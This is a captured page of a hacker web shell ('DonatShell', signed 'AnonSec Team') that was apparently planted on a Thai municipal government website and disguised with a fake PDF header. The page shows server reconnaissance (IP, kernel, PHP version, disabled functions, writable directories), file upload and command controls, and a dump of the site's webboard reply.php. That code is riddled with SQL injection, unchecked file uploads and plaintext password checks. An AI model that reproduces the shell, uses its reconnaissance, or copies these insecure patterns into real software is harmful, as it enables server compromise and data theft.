%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 122.155.177.87  /  Your IP : 122.155.177.87
Web Server : Apache/2
System : Linux cat177-87.static.lnwhostname.com 3.10.0-1160.62.1.el7.x86_64 #1 SMP Tue Apr 5 16:57:59 UTC 2022 x86_64
User : apache ( 994)
PHP Version : 5.3.29
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,putenv,eval
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/thungkhana/domains/thungkhanan.go.th/public_html/webboard/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/thungkhana/domains/thungkhanan.go.th/public_html/webboard/reply.php
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!-- InstanceBegin template="/Templates/template_a.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>                                                                                                    
<!-- InstanceBeginEditable name="doctitle" -->
<META HTTP-EQUIV="REFRESH" CONTENT="2; URL=show.php?Category=<? echo $Category; ?>&No=<? echo $No; ?>">
<!-- InstanceEndEditable --> 
<?php
require_once('../admin/Connections/conndb.php'); 
mysql_select_db($database_conndb, $conndb);
?>
<title>ͧúǹӺŷ觢ҹ  99/9  1 Ӻ 觢ҹ  ´ ѧѴ ѹ :: www.thungkhanan.go.th</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="../styles.css" rel="stylesheet" type="text/css">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->


<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
	background-color: #3CFFFF;	
}
-->
</style>

<!--styles -->
<link href="../styles.css" rel="stylesheet" type="text/css" />
<link href="../css/Hover%20Buttons.css" rel="stylesheet" type="text/css"/>
<link href="../css/Hoverable-Sidenav.css" rel="stylesheet" type="text/css"/>
 <!--<script src="https://platform-api.sharethis.com/js/sharethis.js#property=5d255a83d97c100012d80679&product='inline-share-buttons' 
async='async"  type='text/javascript'> -->
   </script>
<!--styles -->


<style type="text/css">
<!--
a:link {
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: none;
}
a:active {
	text-decoration: none;
}
.style6 {color: #FFFFFF}
-->
</style></head>

<body  background="../images/0bg1-edit1.png" style="background-repeat:no-repeat; background-position:top">




<!-- content -->
<div align="center">
  <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td align="center" valign="top"><tr>
        <td height="" align="center" valign="top"><iframe src="/head-slider.html" width="100%" height="627" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe></td>
      </tr>
      <tr>
        <td align="center" valign="top">&nbsp;</td>
      </tr>
      </td>
    </tr>
    <tr>
      <td align="center" valign="top"><table width="980" border="0" align="center" cellpadding="0" cellspacing="0">
        <tr>
          <td align="center" valign="top">&nbsp;</td>
        </tr>
        <tr>
          <td align="center" valign="top">&nbsp;</td>
        </tr>
        <tr>
          <td align="center" valign="top"><!-- InstanceBeginEditable name="EditRegion3" -->
        <table width="98%" border="0" cellspacing="0" cellpadding="0">
          <tr>
            <td>&nbsp;</td>
          </tr>
          <tr>
            <td><div align="center"><?
	include("config.inc.php");
	include("function.php");

	// Ǵͧ纺
	mysql_connect($host,$user_db,$passwd_db);
	mysql_query ("SET NAMES 'tis620'");
	$c_sql = "select * from webboard_category where cat_name='$Category' ";
	$c_result = mysql_db_query($dbname,$c_sql);
	$c_NRow = mysql_num_rows($c_result);
	$c_row = mysql_fetch_array($c_result);
	
	$nlist = $c_row["cat_title"];

	if($c_NRow==0) { 
		echo "<center><br>";
		echo "<font color=red size=+1> سк Category çѺ web Դ¤Ѻ</font>";
		echo "<br>";
		echo "</center>";
		exit();		
	}

	// 

	// 礡õͺӶ
	$sqlc = "select No_com from webboard_ans where QuestionNo='$No' order by No_com DESC";	$resultc = mysql_db_query($dbname,$sqlc) or die ("ö database ӧҹ㹢й");
	$rowc = mysql_fetch_array($resultc);

	// 
	$com1 = $rowc["No_com"];

	// ҵ
	if ($com1=="") {
		$ncom = "";
		}
	else {
		$ncom = $com1;
		}

	// 
	
if ($_SERVER['HTTP_CLIENT_IP']) { 
$IP = $_SERVER['HTTP_CLIENT_IP'];
} elseif (ereg("[0-9]",$_SERVER["HTTP_X_FORWARDED_FOR"] )) { 
$IP = $_SERVER["HTTP_X_FORWARDED_FOR"];
} else { 
$IP = $_SERVER["REMOTE_ADDR"];
}
	$Member = 0;

	// ͧѹá html Ѻ ͧ ' "
	$MsgBy = htmlspecialchars($MsgBy);
	$Email = htmlspecialchars($Email);
	$Msg = htmlspecialchars($Msg);

	// ͧѹҺ
	$MsgBy = CheckRude($MsgBy);
	$Email = CheckRude($Email);
	$Msg = CheckRude($Msg);
	
	// ǨͺáٻҾ
	$txt = array(":b1:", ":b2:",":b3:", ":b4:", ":b5:", ":b6:", ":b7:", ":b8:", ":b9:", ":b10:", ":b11:");
	$pic = array("b1.gif","b2.gif","b3.gif","b4.gif","b5.gif","b6.gif","b7.gif","b8.gif","b9.gif","b10.gif","b11.gif");
	for ($a=0 ; $a<sizeof($txt) ; $a++) {
		$Msg = eregi_replace($txt[$a],"<img src=\"pic/$pic[$a]\">",$Msg);
	}

    // Ǩͺ աû͹ url  email   link
	
		//Ѻ¹ѡз˹ ᷡ html ҧ
		$Msg = eregi_replace ( "\[b\]", "<b> " , $Msg ) ;
		$Msg = eregi_replace ( "\[/b\]", " </b>" , $Msg ) ;
		$Msg = eregi_replace ( "\[i\]", "<i> " , $Msg ) ;
		$Msg = eregi_replace ( "\[/i\]", " </i>" , $Msg ) ;
		$Msg = eregi_replace ( "\[u\]", "<u> " , $Msg ) ;
		$Msg = eregi_replace ( "\[/u\]", " </u>" , $Msg ) ;
		$Msg = eregi_replace ( "\[sup\]", "<sup> " , $Msg ) ;
		$Msg = eregi_replace ( "\[/sup\]", " </sup>" , $Msg ) ;
		$Msg = eregi_replace ( "\[sub\]", "<sub> " , $Msg ) ;
		$Msg = eregi_replace ( "\[/sub\]", " </sub>" , $Msg ) ;
		$Msg = eregi_replace ( "\[glow\]"," <table style=\"filter:glow(color=pink, strength=3)\"> ", $Msg ) ;
		$Msg = eregi_replace ( "\[/glow\]", " </table>" , $Msg ) ;
		$Msg = eregi_replace ( "\[shadow\]"," <table style=\"filter:shadow(color=pink, direction=left)\"> ", $Msg ) ;
		$Msg = eregi_replace ( "\[/shadow\]", " </table>" , $Msg ) ;
		$Msg = eregi_replace ( "\[\-\-\-\]", "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;" , $Msg ) ;
		$Msg = eregi_replace ( "\[color=red\]", "<font color=red> " , $Msg ) ;
		$Msg = eregi_replace ( "\[color=green\]", "<font color=green> " , $Msg ) ;
		$Msg = eregi_replace ( "\[color=blue\]", "<font color=blue> " , $Msg ) ;
		$Msg = eregi_replace ( "\[color=orange\]", "<font color=FF6600> " , $Msg ) ;
		$Msg = eregi_replace ( "\[color=pink\]", "<font color=FF00FF> " , $Msg) ;
		$Msg = eregi_replace ( "\[color=gray\]", "<font color=999999> " , $Msg ) ;
		$Msg = eregi_replace ( "\[/color\]", " </font>" , $Msg ) ;
	
	
	// 鹺ѹѴ óշա Enter
	$Msg = eregi_replace(chr(13)," <br> ",$Msg );
	$Msg = eregi_replace("(^|[>[:space:]\n])([[:alnum:]]+)://([^[:space:]]*)([[:alnum:]#?/&=])([<[:space:]\n]|$)","<a href=\"\\2://\\3\\4\" target=\"_blank\">\\2://\\3\\4</a>", $Msg );

	$Msg = eregi_replace("([[:alnum:]]+)@([^[:space:]]*)([[:alnum:]])([<[:space:]\n]|$)","<a href=mailto:\\1@\\2\\3\>\\1@\\2\\3</a>", $Msg ); 

	//Ǩͺʡз (Թ ӹǹк config)
	CheckFlood($IP);
	
	// ǨͺҪԡ 

	$sql = "select User,Password,Email from webboard_member where User='$MsgBy'";
	$result = mysql_db_query($dbname,$sql);
	$row = mysql_fetch_array($result);

	$Member = $row["User"];

	// Ǩͺ Password ١	
	if($MsgBy==$row["User"] && $QPass==$row["Password"]) { 
		$Member = 1;
		if(!$Email) {
			$Email = $row["Email"];
		}
	}else
	 {
	$Member = 0;
	 }

// ӡ ҡõͺͧҪԡ
	if($Member) {
			$sql3 = "update webboard_member set m_reply=m_reply+1 where User='$MsgBy'";
			$result3 = mysql_db_query($dbname,$sql3);
	}
	else {	};
// ÷ӧҹ
	
// ѹ֡ٻҾ

	if(($Msg =='')&&($QName==''))
		{
			echo "<br><br><center >";
			echo "ͤóҨú ͵ҧ觢 س觢ͤա<br>";
			echo "<a href='javascript:history.back(1)'>[ Ѻ ] </a>";
			echo "</center>";
			exit();
	}


if( $QPic !='')
	{ 

			srand((double)microtime()*1000000); 
			$QPic_name=$random_pic = rand(1,9999);

# Ǩͺҧͧٻ
				$size = getimagesize($QPic);	


# ǨͺҴͧ Flash
if ( $QPic_type == "application/x-shockwave-flash" )	{
		if($QPic_size>$flashSize_limit) {
				echo "<br><b><center><font size=3 color=red >Ҵͧ Flash Թ $flashSize_limit bytes [$flashSize_msg]</font></center></b><br>";
				echo "<br><b><center><font size=3 color=red >[&nbsp;<a href='javascript:history.back(1)'>Ѻ</a>&nbsp;]</font></center></b>";
				exit();
			}
	}
else {

# ǨͺҴͧٻ
		if($QPic_size>$Image_size) {
				echo "<br><b><center><font size=3 color=red >ҴͧҾԹ $Image_size bytes [$Image_msg]</font></center></b><br>";
				echo "<br><b><center><font size=3 color=red >[&nbsp;<a href='javascript:history.back(1)'>Ѻ</a>&nbsp;]</font></center></b>";
				exit();
			}
}

#ŧʡ зӡ upload
if ( $QPic_type == "image/gif" )
		{
			$filename = $QPic_name.".gif";
		}
if ( $QPic_type == "image/bmp" )
		{
			$filename = $QPic_name.".bmp";
		}
if ( $QPic_type == "image/png" )
		{
			$filename = $QPic_name.".png";
		}
if ( $QPic_type == "application/x-shockwave-flash" )
		{
			$filename = $QPic_name.".swf";
		}
elseif (($QPic_type=="image/jpg")||($QPic_type=="image/jpeg")||($QPic_type=="image/pjpeg"))
		{
			$filename =strtolower($QPic_name.$random_pic . '.jpg');
		}
			copy ($QPic , "$path/" . $filename );		
	}


elseif ($QPic == "")
{
echo "";
}


	//ҨеçѺͧ server ѹ 
	$mdate = date("Y-m-d H:i:s");	


//ʤԻѡзС͹ŧҹ
	if(ereg("www",$_POST[Msg]) || ereg("http",$_POST[Msg]) || ereg("<a href",$_POST[Msg]) || ereg("<",$_POST[Msg])){
  		echo "\n";
		echo "<center>";
		echo "<BR><BR><a href='javascript:history.back(1)' class='styles2'> س͡١ͧ</a><BR><BR><BR><BR>";
		exit;
}


	 if(strcmp($_POST['code_input'],$_POST['code_hidden'])==0){ 		


	// ѹ֡ŧ database
	$sql1 = "INSERT INTO webboard_ans (QuestionNo, Name,Namer, Member, IP, Email, Msg, Date,nphoto,No_com,resolution) VALUES ('$No','$MsgBy', '$MsgBy', '$Member', '$IP', '$Email', '$Msg', '$mdate','$filename',$ncom+1,'$size[0]')";
	$sql2 = "UPDATE webboard_data SET Reply=Reply+1, ReplyDate='$mdate',Namer='$MsgBy',Memberr='$Member' WHERE No='$No'";

	mysql_query("update webboard_ans set Namer='$MsgBy' where No='$No'");

	$result1 = mysql_db_query($dbname,$sql1);
	$result2 = mysql_db_query($dbname,$sql2);

	$ShowNo = sprintf("%05d",$No);
	mysql_close();
?></div></td>
          </tr>
          <tr>
            <td>&nbsp;</td>
          </tr>
          <tr>
            <td><div align="center">
              <table width=60% border=0 bgcolor=#000000 cellpadding=7 cellspacing=1>
                <tr>
                  <td align=center bgcolor=#ffffff class="styles3"><span class="red">ѺǤѺ</span><br>
                        <br>
                    ҡӵͺͧس顴 Refresh/Reload Ѻ </font></td>
                </tr>
              </table>
            </div></td>
          </tr>
          <tr>
            <td>&nbsp;</td>
          </tr>
          <tr>
            <td class="styles3"><div align="center">| <a href="webboard.php?Category=<? echo $Category; ?>" class="styles2">ʴӶ</a> | | <a href="show.php?Category=<? echo $Category; ?>" class="styles2">٤ӵͺ</a> | | <a href="postq.php?Category=<? echo $Category; ?>" class="styles2">駡з </a>|</div></td>
          </tr>
		    <?
					 }
				else{
					echo "<br><b><center><span class=red>س Verification code</span></center></b><br>";
					echo "<br><b><center><span class=styles1 >[&nbsp;<a href='javascript:history.back(1)' class=styles2>Ѻ</a>&nbsp;]</span></center></b>";
			}
			?>
          <tr>
            <td>&nbsp;</td>
          </tr>
        </table>
      <!-- InstanceEndEditable --></td>
        </tr>
      </table></td>
    </tr>
    <tr>
      <td align="center" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="center" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="center" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="center" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="center" valign="top" style="background-repeat:no-repeat"><img src="../images/foot.png"></td>
    </tr>
  </table>
</div>
<!-- end_content -->

<tr><td><a style="display:scroll;position:fixed;bottom:5px;right:5px;" class="backtotop" href="#top" rel="nofollow" title="Back to Top"><img src="../images/up.png" border="0" /></a></td>
</tr>








<map name="Map6" id="Map6"><area shape="rect" coords="210,1,302,41" href="http://www.tratlocal.go.th/index.php" target="_blank" />
</map>
</body>
<!-- InstanceEnd --></html>

Anon7 - 2022
AnonSec Team